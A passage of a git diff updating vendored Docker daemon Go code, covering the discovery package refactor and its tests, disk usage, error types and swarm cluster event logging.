+ defer cleanup() + d.containers.Add(c.ID, c) // Try to remove the container when its state is removalInProgress. // It should return an error indicating it is under removal progress. - if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil { - t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID)) - } + err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true}) + assert.Check(t, is.ErrorContains(err, fmt.Sprintf("removal of container %s is already in progress", c.ID))) } diff --git a/vendor/github.com/docker/docker/daemon/dependency.go b/vendor/github.com/docker/docker/daemon/dependency.go new file mode 100644 index 0000000000..45275dbf4c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/dependency.go @@ -0,0 +1,17 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/swarmkit/agent/exec" +) + +// SetContainerDependencyStore sets the dependency store backend for the container +func (daemon *Daemon) SetContainerDependencyStore(name string, store exec.DependencyGetter) error { + c, err := daemon.GetContainer(name) + if err != nil { + return err + } + + c.DependencyStore = store + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery/discovery.go similarity index 83% rename from vendor/github.com/docker/docker/daemon/discovery.go rename to vendor/github.com/docker/docker/daemon/discovery/discovery.go index ee4ea875b7..092c57638a 100644 --- a/vendor/github.com/docker/docker/daemon/discovery.go +++ b/vendor/github.com/docker/docker/daemon/discovery/discovery.go @@ -1,14 +1,13 @@ -package daemon +package discovery // import "github.com/docker/docker/daemon/discovery" import ( "errors" "fmt" - "reflect" "strconv" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/discovery" + "github.com/sirupsen/logrus" // Register the libkv backends for discovery. _ "github.com/docker/docker/pkg/discovery/kv" @@ -21,9 +20,11 @@ const ( defaultDiscoveryTTLFactor = 3 ) -var errDiscoveryDisabled = errors.New("discovery is disabled") +// ErrDiscoveryDisabled is an error returned if the discovery is disabled +var ErrDiscoveryDisabled = errors.New("discovery is disabled") -type discoveryReloader interface { +// Reloader is the discovery reloader of the daemon +type Reloader interface { discovery.Watcher Stop() Reload(backend, address string, clusterOpts map[string]string) error @@ -80,8 +81,7 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, ttl = time.Duration(t) * time.Second if _, ok := clusterOpts["discovery.heartbeat"]; !ok { - h := int(t / defaultDiscoveryTTLFactor) - heartbeat = time.Duration(h) * time.Second + heartbeat = time.Duration(t) * time.Second / time.Duration(defaultDiscoveryTTLFactor) } if ttl <= heartbeat { @@ -93,9 +93,9 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration, return heartbeat, ttl, nil } -// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend +// Init initializes the nodes discovery subsystem by connecting to the specified backend // and starts a registration loop to advertise the current node under the specified address. -func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) { +func Init(backendAddress, advertiseAddress string, clusterOpts map[string]string) (Reloader, error) { heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts) if err != nil { return nil, err @@ -121,6 +121,8 @@ func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) { if err := d.initHeartbeat(address); err == nil { ready = true close(d.readyCh) + } else { + logrus.WithError(err).Debug("First discovery heartbeat failed") } for { @@ -198,18 +200,3 @@ func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string) } return heartbeat, backend, nil } - -// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not. -func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { - if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { - return true - } - - if (config.ClusterOpts == nil && clusterOpts == nil) || - (config.ClusterOpts == nil && len(clusterOpts) == 0) || - (len(config.ClusterOpts) == 0 && clusterOpts == nil) { - return false - } - - return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) -} diff --git a/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go new file mode 100644 index 0000000000..c354a2918d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go @@ -0,0 +1,96 @@ +package discovery // import "github.com/docker/docker/daemon/discovery" + +import ( + "fmt" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDiscoveryOptsErrors(t *testing.T) { + var testcases = []struct { + doc string + opts map[string]string + }{ + { + doc: "discovery.ttl < discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"}, + }, + { + doc: "discovery.ttl == discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"}, + }, + { + doc: "negative discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"}, + }, + { + doc: "negative discovery.ttl", + opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"}, + }, + { + doc: "invalid discovery.heartbeat", + opts: map[string]string{"discovery.heartbeat": "invalid"}, + }, + { + doc: "invalid discovery.ttl", + opts: map[string]string{"discovery.ttl": "invalid"}, + }, + } + + for _, testcase := range testcases { + _, _, err := discoveryOpts(testcase.opts) + assert.Check(t, is.ErrorContains(err, ""), testcase.doc) + } +} + +func TestDiscoveryOpts(t *testing.T) { + clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} + heartbeat, ttl, err := discoveryOpts(clusterOpts) + assert.NilError(t, err) + assert.Check(t, is.Equal(10*time.Second, heartbeat)) + assert.Check(t, is.Equal(20*time.Second, ttl)) + + clusterOpts = map[string]string{"discovery.heartbeat": "10"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + assert.NilError(t, err) + assert.Check(t, is.Equal(10*time.Second, heartbeat)) + assert.Check(t, is.Equal(10*defaultDiscoveryTTLFactor*time.Second, ttl)) + + clusterOpts = map[string]string{"discovery.ttl": "30"} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + assert.NilError(t, err) + + if ttl != 30*time.Second { + t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) + } + + expected := 30 * time.Second / defaultDiscoveryTTLFactor + if heartbeat != expected { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) + } + + discoveryTTL := fmt.Sprintf("%d", defaultDiscoveryTTLFactor-1) + clusterOpts = map[string]string{"discovery.ttl": discoveryTTL} + heartbeat, _, err = discoveryOpts(clusterOpts) + if err == nil && heartbeat == 0 { + t.Fatal("discovery.heartbeat must be positive") + } + + clusterOpts = map[string]string{} + heartbeat, ttl, err = discoveryOpts(clusterOpts) + if err != nil { + t.Fatal(err) + } + + if heartbeat != defaultDiscoveryHeartbeat { + t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) + } + + expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor + if ttl != expected { + t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) + } +} diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go deleted file mode 100644 index 336973c516..0000000000 --- a/vendor/github.com/docker/docker/daemon/discovery_test.go +++ /dev/null @@ -1,164 +0,0 @@ -package daemon - -import ( - "testing" - "time" -) - -func TestDiscoveryOpts(t *testing.T) { - clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"} - heartbeat, ttl, err := discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("discovery.ttl < discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("discovery.ttl == discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("negative discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("negative discovery.ttl must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "invalid"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("invalid discovery.heartbeat must fail") - } - - clusterOpts = map[string]string{"discovery.ttl": "invalid"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err == nil { - t.Fatalf("invalid discovery.ttl must fail") - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != 10*time.Second { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) - } - - if ttl != 20*time.Second { - t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl) - } - - clusterOpts = map[string]string{"discovery.heartbeat": "10"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != 10*time.Second { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat) - } - - expected := 10 * defaultDiscoveryTTLFactor * time.Second - if ttl != expected { - t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) - } - - clusterOpts = map[string]string{"discovery.ttl": "30"} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if ttl != 30*time.Second { - t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl) - } - - expected = 30 * time.Second / defaultDiscoveryTTLFactor - if heartbeat != expected { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat) - } - - clusterOpts = map[string]string{} - heartbeat, ttl, err = discoveryOpts(clusterOpts) - if err != nil { - t.Fatal(err) - } - - if heartbeat != defaultDiscoveryHeartbeat { - t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat) - } - - expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor - if ttl != expected { - t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl) - } -} - -func TestModifiedDiscoverySettings(t *testing.T) { - cases := []struct { - current *Config - modified *Config - expected bool - }{ - { - current: discoveryConfig("foo", "bar", map[string]string{}), - modified: discoveryConfig("foo", "bar", map[string]string{}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", map[string]string{}), - modified: discoveryConfig("foo", "bar", nil), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "bar", map[string]string{}), - expected: false, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("baz", "bar", nil), - expected: true, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "baz", nil), - expected: true, - }, - { - current: discoveryConfig("foo", "bar", nil), - modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), - expected: true, - }, - } - - for _, c := range cases { - got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) - if c.expected != got { - t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) - } - } -} - -func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config { - return &Config{ - CommonConfig: CommonConfig{ - ClusterStore: backendAddr, - ClusterAdvertise: advertiseAddr, - ClusterOpts: opts, - }, - } -} diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go index c3b918660d..5bec60d174 100644 --- a/vendor/github.com/docker/docker/daemon/disk_usage.go +++ b/vendor/github.com/docker/docker/daemon/disk_usage.go @@ -1,40 +1,21 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "sync/atomic" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/directory" - "github.com/docker/docker/volume" ) -func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int { - tmpImages := daemon.imageStore.Map() - layerRefs := map[layer.ChainID]int{} - for id, img := range tmpImages { - dgst := digest.Digest(id) - if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { - continue - } - - rootFS := *img.RootFS - rootFS.DiffIDs = nil - for _, id := range img.RootFS.DiffIDs { - rootFS.Append(id) - chid := rootFS.ChainID() - layerRefs[chid]++ - } +// SystemDiskUsage returns information about the daemon data disk usage +func (daemon *Daemon) SystemDiskUsage(ctx context.Context) (*types.DiskUsage, error) { + if !atomic.CompareAndSwapInt32(&daemon.diskUsageRunning, 0, 1) { + return nil, fmt.Errorf("a disk usage operation is already running") } + defer atomic.StoreInt32(&daemon.diskUsageRunning, 0) - return layerRefs -} - -// SystemDiskUsage returns information about the daemon data disk usage -func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { // Retrieve container list allContainers, err := daemon.Containers(&types.ContainerListOptions{ Size: true, @@ -45,56 +26,25 @@ func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) { } // Get all top images with extra attributes - allImages, err := daemon.Images(filters.NewArgs(), false, true) + allImages, err := daemon.imageService.Images(filters.NewArgs(), false, true) if err != nil { return nil, fmt.Errorf("failed to retrieve image list: %v", err) } - // Get all local volumes - allVolumes := []*types.Volume{} - getLocalVols := func(v volume.Volume) error { - name := v.Name() - refs := daemon.volumes.Refs(v) - - tv := volumeToAPIType(v) - sz, err := directory.Size(v.Path()) - if err != nil { - logrus.Warnf("failed to determine size of volume %v", name) - sz = -1 - } - tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))} - allVolumes = append(allVolumes, tv) - - return nil - } - - err = daemon.traverseLocalVolumes(getLocalVols) + localVolumes, err := daemon.volumes.LocalVolumesSize(ctx) if err != nil { return nil, err } - // Get total layers size on disk - layerRefs := daemon.getLayerRefs() - allLayers := daemon.layerStore.Map() - var allLayersSize int64 - for _, l := range allLayers { - size, err := l.DiffSize() - if err == nil { - if _, ok := layerRefs[l.ChainID()]; ok { - allLayersSize += size - } else { - logrus.Warnf("found leaked image layer %v", l.ChainID()) - } - } else { - logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) - } - + allLayersSize, err := daemon.imageService.LayerDiskUsage(ctx) + if err != nil { + return nil, err } return &types.DiskUsage{ LayersSize: allLayersSize, Containers: allContainers, - Volumes: allVolumes, + Volumes: localVolumes, Images: allImages, }, nil } diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go index 566a32f175..6d02af3d54 100644 --- a/vendor/github.com/docker/docker/daemon/errors.go +++ b/vendor/github.com/docker/docker/daemon/errors.go @@ -1,57 +1,155 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "strings" + "syscall" - "github.com/docker/docker/api/errors" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "google.golang.org/grpc" ) -func (d *Daemon) imageNotExistToErrcode(err error) error { - if dne, isDNE := err.(ErrImageDoesNotExist); isDNE { - if strings.Contains(dne.RefOrID, "@") { - e := fmt.Errorf("No such image: %s", dne.RefOrID) - return errors.NewRequestNotFoundError(e) - } - tag := reference.DefaultTag - ref, err := reference.ParseNamed(dne.RefOrID) - if err != nil { - e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag) - return errors.NewRequestNotFoundError(e) - } - if tagged, isTagged := ref.(reference.NamedTagged); isTagged { - tag = tagged.Tag() - } - e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag) - return errors.NewRequestNotFoundError(e) - } - return err +func errNotRunning(id string) error { + return errdefs.Conflict(errors.Errorf("Container %s is not running", id)) } -type errNotRunning struct { - containerID string +func containerNotFound(id string) error { + return objNotFoundError{"container", id} } -func (e errNotRunning) Error() string { - return fmt.Sprintf("Container %s is not running", e.containerID) +type objNotFoundError struct { + object string + id string } -func (e errNotRunning) ContainerIsRunning() bool { - return false +func (e objNotFoundError) Error() string { + return "No such " + e.object + ": " + e.id } +func (e objNotFoundError) NotFound() {} + func errContainerIsRestarting(containerID string) error { - err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID) - return errors.NewRequestConflictError(err) + cause := errors.Errorf("Container %s is restarting, wait until the container is running", containerID) + return errdefs.Conflict(cause) } func errExecNotFound(id string) error { - err := fmt.Errorf("No such exec instance '%s' found in daemon", id) - return errors.NewRequestNotFoundError(err) + return objNotFoundError{"exec instance", id} } func errExecPaused(id string) error { - err := fmt.Errorf("Container %s is paused, unpause the container before exec", id) - return errors.NewRequestConflictError(err) + cause := errors.Errorf("Container %s is paused, unpause the container before exec", id) + return errdefs.Conflict(cause) +} + +func errNotPaused(id string) error { + cause := errors.Errorf("Container %s is already paused", id) + return errdefs.Conflict(cause) +} + +type nameConflictError struct { + id string + name string +} + +func (e nameConflictError) Error() string { + return fmt.Sprintf("Conflict. The container name %q is already in use by container %q. You have to remove (or rename) that container to be able to reuse that name.", e.name, e.id) +} + +func (nameConflictError) Conflict() {} + +type containerNotModifiedError struct { + running bool +} + +func (e containerNotModifiedError) Error() string { + if e.running { + return "Container is already started" + } + return "Container is already stopped" +} + +func (e containerNotModifiedError) NotModified() {} + +type invalidIdentifier string + +func (e invalidIdentifier) Error() string { + return fmt.Sprintf("invalid name or ID supplied: %q", string(e)) +} + +func (invalidIdentifier) InvalidParameter() {} + +type duplicateMountPointError string + +func (e duplicateMountPointError) Error() string { + return "Duplicate mount point: " + string(e) +} +func (duplicateMountPointError) InvalidParameter() {} + +type containerFileNotFound struct { + file string + container string +} + +func (e containerFileNotFound) Error() string { + return "Could not find the file " + e.file + " in container " + e.container +} + +func (containerFileNotFound) NotFound() {} + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} + +type startInvalidConfigError string + +func (e startInvalidConfigError) Error() string { + return string(e) +} + +func (e startInvalidConfigError) InvalidParameter() {} // Is this right??? + +func translateContainerdStartErr(cmd string, setExitCode func(int), err error) error { + errDesc := grpc.ErrorDesc(err) + contains := func(s1, s2 string) bool { + return strings.Contains(strings.ToLower(s1), s2) + } + var retErr = errdefs.Unknown(errors.New(errDesc)) + // if we receive an internal error from the initial start of a container then lets + // return it instead of entering the restart loop + // set to 127 for container cmd not found/does not exist) + if contains(errDesc, cmd) && + (contains(errDesc, "executable file not found") || + contains(errDesc, "no such file or directory") || + contains(errDesc, "system cannot find the file specified")) { + setExitCode(127) + retErr = startInvalidConfigError(errDesc) + } + // set to 126 for container cmd can't be invoked errors + if contains(errDesc, syscall.EACCES.Error()) { + setExitCode(126) + retErr = startInvalidConfigError(errDesc) + } + + // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts + if contains(errDesc, syscall.ENOTDIR.Error()) { + errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type" + setExitCode(127) + retErr = startInvalidConfigError(errDesc) + } + + // TODO: it would be nice to get some better errors from containerd so we can return better errors here + return retErr } diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go index 8fe8e1b640..cf1634a198 100644 --- a/vendor/github.com/docker/docker/daemon/events.go +++ b/vendor/github.com/docker/docker/daemon/events.go @@ -1,6 +1,8 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" + "strconv" "strings" "time" @@ -9,6 +11,17 @@ import ( "github.com/docker/docker/container" daemonevents "github.com/docker/docker/daemon/events" "github.com/docker/libnetwork" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" + "github.com/sirupsen/logrus" +) + +var ( + clusterEventAction = map[swarmapi.WatchActionKind]string{ + swarmapi.WatchActionKindCreate: "create", + swarmapi.WatchActionKindUpdate: "update", + swarmapi.WatchActionKindRemove: "remove", + } ) // LogContainerEvent generates an event related to a container with only the default attributes. @@ -31,30 +44,6 @@ func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Conta daemon.EventsService.Log(action, events.ContainerEventType, actor) } -// LogImageEvent generates an event related to an image with only the default attributes. -func (daemon *Daemon) LogImageEvent(imageID, refName, action string) { - daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) -} - -// LogImageEventWithAttributes generates an event related to an image with specific given attributes. -func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { - img, err := daemon.GetImage(imageID) - if err == nil && img.Config != nil { - // image has not been removed yet. - // it could be missing if the event is `delete`. - copyAttributes(attributes, img.Config.Labels) - } - if refName != "" { - attributes["name"] = refName - } - actor := events.Actor{ - ID: imageID, - Attributes: attributes, - } - - daemon.EventsService.Log(action, events.ImageEventType, actor) -} - // LogPluginEvent generates an event related to a plugin with only the default attributes. func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) { daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{}) @@ -130,3 +119,190 @@ func copyAttributes(attributes, labels map[string]string) { attributes[k] = v } } + +// ProcessClusterNotifications gets changes from store and add them to event list +func (daemon *Daemon) ProcessClusterNotifications(ctx context.Context, watchStream chan *swarmapi.WatchMessage) { + for { + select { + case <-ctx.Done(): + return + case message, ok := <-watchStream: + if !ok { + logrus.Debug("cluster event channel has stopped") + return + } + daemon.generateClusterEvent(message) + } + } +} + +func (daemon *Daemon) generateClusterEvent(msg *swarmapi.WatchMessage) { + for _, event := range msg.Events { + if event.Object == nil { + logrus.Errorf("event without object: %v", event) + continue + } + switch v := event.Object.GetObject().(type) { + case *swarmapi.Object_Node: + daemon.logNodeEvent(event.Action, v.Node, event.OldObject.GetNode()) + case *swarmapi.Object_Service: + daemon.logServiceEvent(event.Action, v.Service, event.OldObject.GetService()) + case *swarmapi.Object_Network: + daemon.logNetworkEvent(event.Action, v.Network, event.OldObject.GetNetwork()) + case *swarmapi.Object_Secret: + daemon.logSecretEvent(event.Action, v.Secret, event.OldObject.GetSecret()) + case *swarmapi.Object_Config: + daemon.logConfigEvent(event.Action, v.Config, event.OldObject.GetConfig()) + default: + logrus.Warnf("unrecognized event: %v", event) + } + } +} + +func (daemon *Daemon) logNetworkEvent(action swarmapi.WatchActionKind, net *swarmapi.Network, oldNet *swarmapi.Network) { + attributes := map[string]string{ + "name": net.Spec.Annotations.Name, + } + eventTime := eventTimestamp(net.Meta, action) + daemon.logClusterEvent(action, net.ID, "network", attributes, eventTime) +} + +func (daemon *Daemon) logSecretEvent(action swarmapi.WatchActionKind, secret *swarmapi.Secret, oldSecret *swarmapi.Secret) { + attributes := map[string]string{ + "name": secret.Spec.Annotations.Name, + } + eventTime := eventTimestamp(secret.Meta, action) + daemon.logClusterEvent(action, secret.ID, "secret", attributes, eventTime) +} + +func (daemon *Daemon) logConfigEvent(action swarmapi.WatchActionKind, config *swarmapi.Config, oldConfig *swarmapi.Config) { + attributes := map[string]string{ + "name": config.Spec.Annotations.Name, + } + eventTime := eventTimestamp(config.Meta, action) + daemon.logClusterEvent(action, config.ID, "config", attributes, eventTime) +} + +func (daemon *Daemon) logNodeEvent(action swarmapi.WatchActionKind, node *swarmapi.Node, oldNode *swarmapi.Node) { + name := node.Spec.Annotations.Name + if name == "" && node.Description != nil { + name = node.Description.Hostname + } + attributes := map[string]string{ + "name": name, + } + eventTime := eventTimestamp(node.Meta, action) + // In an update event, display the changes in attributes + if action == swarmapi.WatchActionKindUpdate && oldNode != nil { + if node.Spec.Availability != oldNode.Spec.Availability { + attributes["availability.old"] = strings.ToLower(oldNode.Spec.Availability.String()) + attributes["availability.new"] = strings.ToLower(node.Spec.Availability.String()) + } + if node.Role != oldNode.Role { + attributes["role.old"] = strings.ToLower(oldNode.Role.String()) + attributes["role.new"] = strings.ToLower(node.Role.String()) + } + if node.Status.State != oldNode.Status.State { + attributes["state.old"] = strings.ToLower(oldNode.Status.State.String()) + attributes["state.new"] = strings.ToLower(node.Status.State.String()) + } + // This handles change within manager role + if node.ManagerStatus != nil && oldNode.ManagerStatus != nil { + // leader change + if node.ManagerStatus.Leader != oldNode.ManagerStatus.Leader { + if node.ManagerStatus.Leader { + attributes["leader.old"] = "false" + attributes["leader.new"] = "true" + } else { + attributes["leader.old"] = "true" + attributes["leader.new"] = "false" + } + } + if node.ManagerStatus.Reachability != oldNode.ManagerStatus.Reachability { + attributes["reachability.old"] = strings.ToLower(oldNode.ManagerStatus.Reachability.String()) + attributes["reachability.new"] = strings.ToLower(node.ManagerStatus.Reachability.String()) + } + } + } + + daemon.logClusterEvent(action, node.ID, "node", attributes, eventTime) +} + +func (daemon *Daemon) logServiceEvent(action swarmapi.WatchActionKind, service *swarmapi.Service, oldService *swarmapi.Service) { + attributes := map[string]string{ + "name": service.Spec.Annotations.Name, + } + eventTime := eventTimestamp(service.Meta, action) + + if action == swarmapi.WatchActionKindUpdate && oldService != nil { + // check image + if x, ok := service.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok { + containerSpec := x.Container + if y, ok := oldService.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok { + oldContainerSpec := y.Container + if containerSpec.Image != oldContainerSpec.Image { + attributes["image.old"] = oldContainerSpec.Image + attributes["image.new"] = containerSpec.Image + } + } else { + // This should not happen. + logrus.Errorf("service %s runtime changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.Task.GetRuntime(), service.Spec.Task.GetRuntime()) + } + } + // check replicated count change + if x, ok := service.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok { + replicas := x.Replicated.Replicas + if y, ok := oldService.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok { + oldReplicas := y.Replicated.Replicas + if replicas != oldReplicas { + attributes["replicas.old"] = strconv.FormatUint(oldReplicas, 10) + attributes["replicas.new"] = strconv.FormatUint(replicas, 10) + } + } else { + // This should not happen. + logrus.Errorf("service %s mode changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.GetMode(), service.Spec.GetMode()) + } + } + if service.UpdateStatus != nil { + if oldService.UpdateStatus == nil { + attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String()) + } else if service.UpdateStatus.State != oldService.UpdateStatus.State { + attributes["updatestate.old"] = strings.ToLower(oldService.UpdateStatus.State.String()) + attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String()) + } + } + } + daemon.logClusterEvent(action, service.ID, "service", attributes, eventTime) +} + +func (daemon *Daemon) logClusterEvent(action swarmapi.WatchActionKind, id, eventType string, attributes map[string]string, eventTime time.Time) { + actor := events.Actor{ + ID: id, + Attributes: attributes, + } + + jm := events.Message{ + Action: clusterEventAction[action], + Type: eventType, + Actor: actor, + Scope: "swarm", + Time: eventTime.UTC().Unix(), + TimeNano: eventTime.UTC().UnixNano(), + } + daemon.EventsService.PublishMessage(jm) +} + +func eventTimestamp(meta swarmapi.Meta, action swarmapi.WatchActionKind) time.Time { + var eventTime time.Time + switch action { + case swarmapi.WatchActionKindCreate: + eventTime, _ = gogotypes.TimestampFromProto(meta.CreatedAt) + case swarmapi.WatchActionKindUpdate: + eventTime, _ = gogotypes.TimestampFromProto(meta.UpdatedAt) + case swarmapi.WatchActionKindRemove: + // There is no timestamp from store message for remove operations. + // Use current time. + eventTime = time.Now() + } + return eventTime +} diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go index 0bf105f54d..31af271fe6 100644 --- a/vendor/github.com/docker/docker/daemon/events/events.go +++ b/vendor/github.com/docker/docker/daemon/events/events.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( "sync" @@ -9,7 +9,7 @@ import ( ) const ( - eventsLimit = 64 + eventsLimit = 256 bufferSize = 1024 ) @@ -28,7 +28,7 @@ func New() *Events { } } -// Subscribe adds new listener to events, returns slice of 64 stored +// Subscribe adds new listener to events, returns slice of 256 stored // last events, a channel in which you can expect new events (in form // of interface{}, so you need type assertion), and a function to call // to stop the stream of events. @@ -46,7 +46,7 @@ func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) { return current, l, cancel } -// SubscribeTopic adds new listener to events, returns slice of 64 stored +// SubscribeTopic adds new listener to events, returns slice of 256 stored // last events, a channel in which you can expect new events (in form // of interface{}, so you need type assertion). func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) { @@ -78,15 +78,14 @@ func (e *Events) Evict(l chan interface{}) { e.pub.Evict(l) } -// Log broadcasts event to listeners. Each listener has 100 millisecond for -// receiving event or it will be skipped. +// Log creates a local scope message and publishes it func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { - eventsCounter.Inc() now := time.Now().UTC() jm := eventtypes.Message{ Action: action, Type: eventType, Actor: actor, + Scope: "local", Time: now.Unix(), TimeNano: now.UnixNano(), } @@ -102,6 +101,14 @@ func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { jm.Status = action } + e.PublishMessage(jm) +} + +// PublishMessage broadcasts event to listeners. Each listener has 100 milliseconds to +// receive the event or it will be skipped. +func (e *Events) PublishMessage(jm eventtypes.Message) { + eventsCounter.Inc() + 